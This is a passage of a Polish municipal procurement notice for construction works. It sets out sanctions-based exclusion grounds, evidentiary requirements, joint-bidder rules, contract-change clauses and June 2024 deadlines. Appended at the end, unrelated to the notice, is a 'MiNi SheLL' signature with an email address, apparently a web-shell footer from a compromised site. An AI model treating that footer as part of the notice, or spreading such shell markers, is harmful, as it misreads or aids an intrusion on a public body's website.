zamówienia publicznego na podstawie pkt. 7.7. SWZ<br/>podlegają:<br/>1) wykonawcy wymienieni w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego<br/>środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z<br/>20.05.2006, str. 1, z późn. zm.) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków<br/>ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im<br/>zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.), albo wpisani na listę, o której mowa w art. 2 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, na podstawie decyzji w sprawie wpisu na ww. listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 powołanej ustawy;<br/>2) wykonawcy, których beneficjentem rzeczywistym w rozumieniu ustawy z 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 z późn. zm) jest osoba wymieniona w wykazach określonych w rozporządzeniu<br/>Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem<br/>Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.) i rozporządzeniu Rady (UE) nr<br/>269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność<br/>terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.) albo<br/>wpisani na listę o której mowa w art. 2 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, lub będący takim beneficjentem rzeczywistym<br/>od dnia 24 lutego 2022 r., o ile zostali wpisani na ww. listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>3) wykonawcy, których jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z 29 września 1994 r. o rachunkowości (Dz. U.<br/>z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia<br/>18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec<br/>Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w<br/>sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność<br/>Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.) albo wpisany na listę o której mowa w art. 2<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego, lub będący taką jednostką dominującą od 24 lutego 2022 r., o ile został wpisany<br/>na listę na podstawie decyzji w sprawie wpisu na ww. listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. ...Dalsza część w pkt 5.8</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1.	Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert:<br/>a)	nie podlega wykluczeniu,<br/>b)	spełnia warunki udziału w postępowaniu. <br/>8.1.1. Oświadczenie należy złożyć wg wymogów Załącznika Nr 4 i 5 do SWZ. <br/>8.1.2. Jeżeli wykonawca nie złożył oświadczeń, o których mowa w pkt 8.1. SWZ lub są one niekompletne lub zawierają błędy, zamawiający wezwie wykonawcę odpowiednio do jego złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta wykonawcy podlega odrzuceniu bez względu na jego złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania. <br/>8.1.3. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych oświadczeń, o których mowa w pkt 8.1 SWZ.<br/>8.1.4. Jeżeli złożone przez wykonawcę oświadczenia, o których mowa w pkt 8.1 SWZ budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>8.2.	W przypadku, o którym mowa w pkt 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres pracy wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt.<br/>8.2.1.	Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>8.3.	Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania), następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>8.3.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu: wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt. 6.1.4. SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych.<br/>Dalsza część pkt 5.6:<br/>Wykluczenie, o którym mowa w pkt. 7.7. SWZ następuje na okres trwania ww. okoliczności.<br/>W przypadku wykonawcy wykluczonego na podstawie przesłanek wskazanych w pkt. 7.8. SWZ, zamawiający odrzuca ofertę<br/>takiego wykonawcy.<br/>Osoba lub podmiot podlegające wykluczeniu, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia<br/>publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej. Karę<br/>pieniężną, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>Wykluczenie Wykonawcy następuje również na podstawie art. 5k Rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca<br/>2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz.U. L<br/>229 z 31.7.2017), w brzmieniu nadanym Rozporządzeniem Rady (UE) 2022/576 z dnia 8 kwietnia 2022 r. w sprawie zmiany<br/>rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz.U. L 111 z 8.4.2022). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>9.8. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia<br/>wraz z oświadczeniami, o których mowa w pkt. 8.1. SWZ także oświadczenia podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>13.4. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy - do wykorzystania wzór (druk), stanowiący Załącznik Nr 3 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach).<br/>2) Oświadczenia o których mowa w rozdziale 8.1 SWZ, Załącznik Nr 4 i 5;<br/>3) Oświadczenie, o którym mowa w rozdziale 8.2. SWZ, Załącznik Nr 6 (jeżeli dotyczy);<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt. 9.4 SWZ (jeżeli dotyczy);<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby<br/>jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniającego zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit<br/>a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiot udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od Wykonawcy złożenia wraz z<br/>ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>7) Oświadczenia podmiotu udostępniającego zasoby, o których mowa w pkt. 9.8 SWZ (jeżeli dotyczy).<br/>8) Oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w pkt. 10.2 a) SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) W przypadku, o którym mowa w pkt. 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Oświadczenie należy złożyć wg wymogów Załącznika Nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ,<br/>przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy,<br/>który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Oprócz przypadków,o których mowa w art.454 i 455ustawy–Prawo zamówień publicznych,strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty,na <br/>podstawie której dokonano wyboru Wykonawcy,w przypadku wystąpienia którejkolwiek <br/>z następujących okoliczności: <br/>1)przedłużenie terminu realizacji zamówienia, o którym mowa w§4 ust.1,może <br/>nastąpić w przypadku wystąpienia okoliczności siły wyższej,przez którą należy rozumieć <br/>zdarzenia niezależne od żadnej ze stron,zewnętrzne, niemożliwe do zapobieżenia,które <br/>nastąpiło po dniu wejścia w życie umowy,w szczególności:wojny,akty terroryzmu,klęski <br/>żywiołowe,strajki oraz akty władzy i administracji publicznej,przy czym przedłużenie <br/>terminu realizacji zamówienia nastąpi o liczbę dni,odpowiadającą okresowi <br/>występowania okoliczności siły wyższej, <br/>2)przedłużenie terminu realizacji zamówienia,o którym mowa w §4 ust.1,może <br/>nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego <br/>żądania wstrzymania robót budowlanych,stanowiących przedmiot zamówienia lub <br/>wydania zakazu prowadzenia robót budowlanych,stanowiących przedmiot zamówienia <br/>przez organ administracji publicznej lub eksploatatorów infrastruktury,o ile żądanie lub <br/>wydanie zakazu nie nastąpiło z przyczyn,za które Wykonawca ponosi odpowiedzialność, <br/>przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, <br/>odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych <br/>lub zakazano prowadzenie robót budowlanych;<br/>3)przedłużenie terminu realizacji zamówienia,o którym mowa w§4 ust.1,może <br/>nastąpić w przypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi <br/>w dokumentacji projektowej,lub innymi robotami prowadzonymi przez innego <br/>wykonawcę,przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni <br/>niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi <br/>w dokumentacji projektowej lub o liczbę dni niezbędnych do wykonania robót przez <br/>innego wykonawcę–o ile usunięcie kolizji wymagać będzie przedłużenia terminu <br/>realizacji; <br/>4)przedłużenie terminu realizacji zamówienia,o którym mowa w§4 ust.1,może <br/>nastąpić w przypadku wystąpienia konieczności wprowadzenia w dokumentacji <br/>projektowej zmian, powodujących wstrzymanie lub przerwanie robót budowlanych, <br/>stanowiących przedmiot zamówienia,przy czym przedłużenie terminu realizacji <br/>zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji <br/>projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami,uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy,przy <br/>czym wprowadzenie w dokumentacji projektowej zmian nie może skutkować <br/>zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie,stanowiącej załącznik do umowy oraz zwiększeniem wynagrodzenia Wykonawcy,o którym mowa w §6ust.1,<br/>5)przedłużenie terminu realizacji zamówienia,o którym mowa w§4ust.1, może <br/>nastąpić w przypadku wystąpienia warunków terenu budowy odbiegających w sposób <br/>istotny od przyjętych w dokumentacji projektowej,w szczególności napotkanie na <br/>niezinwentaryzowane lub błędnie zinwentaryzowane instalacje podziemne,wystąpienie <br/>kolizji instalacji podziemnych i naziemnych,podziemnych elementów konstrukcyjnych,likwidacji istniejących przyłączy,odkrycie na terenie budowy przedmiotów o znaczeniu <br/>archeologicznym i historycznym,a także kopalnych szczątków roślin lub zwierząt, których <br/>zabezpieczenie i inwentaryzacja uniemożliwia wykonywanie robót budowlanych, <br/>ujawnienia się odmiennych od przyjętych w dokumentacji projektowej, warunków <br/>podpowierzchniowych, geologicznych, gruntowych, hydrologicznych, powodujących <br/>konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu <br/>odmiennych od zaprojektowanych rozwiązań technicznych,przy czym przedłużenie <br/>terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania <br/>utrudnień związanych z ich wystąpieniem,...cd. w sekcji &#34;pozostałe informacje&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy pod adresem: https://pzp.wojciechow.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-13 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. pkt. 7.4. --<br/>6)przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może <br/>nastąpić w przypadku wystąpienia warunków atmosferycznych uniemożliwiających <br/>wykonywanie robót ze względu na zachowanie bezpieczeństwa osób wykonujących prace <br/>lub ze względu na niemożliwość dochowania standardów jakościowych określonych w <br/>obowiązujących przepisach, co zostanie potwierdzone przez inspektora nadzoru, przy <br/>czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni roboczych <br/>wynikających z tych niekorzystnych warunków atmosferycznych,<br/>7) zmiana zakresu świadczeń lub sposobu wykonywania w wyniku konieczności <br/>wykonania robót zamiennych (do których wykonania wystarczy zgoda <br/>zamawiającego/inspektora nadzoru oraz projektanta), rozumianych jako wykonanie <br/>przez Wykonawcę zamówienia podstawowego w sposób odmienny od sposobu <br/>określonego w dokumentacji projektowej i ST, bez modyfikacji ogólnego charakteru <br/>umowy, na podstawie protokołu konieczności,<br/>8) przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do wykonania <br/>robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień <br/>publicznych, <br/>9) zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu <br/>wykonywania zamówienia w przypadku zmiany powszechnie obowiązujących <br/>przepisów prawa w zakresie mającym bezpośredni wpływ na termin realizacji <br/>przedmiotu zamówienia lub zakres świadczeń stron umowy lub sposób jej wykonywania,<br/>10) zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz <br/>Wykonawcy wskutek zaistnienia przyczyn organizacyjnych lub finansowych leżących po <br/>stronie Zamawiającego, w tym na skutek zawartej przez Zamawiającego umowy o <br/>dofinansowanie zadania, w szczególności wynikających ze zmiany zasad płatności <br/>programów lub funduszy lub innych źródeł finansowania inwestycji objętej niniejszą <br/>umową,<br/>11) zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu <br/>wykonywania zamówienia w przypadku konieczności zagwarantowania zgodności <br/>umowy z wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy <br/>przepisami prawa w szczególności przepisami o podatku od towarów i usług w zakresie <br/>wynikającym z tych przepisów.<br/>2. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej i podpisania <br/>przez obydwie strony umowy. <br/>3. Z wnioskiem o zmianę umowy może wystąpić zarówno Wykonawca, jak i Zamawiający. <br/>--Z uwagi na ograniczoną ilość znaków pozostałe zapisy w projekcie umowy Załącznik do SWZ --

Creat By MiNi SheLL
Email: jattceo@gmail.com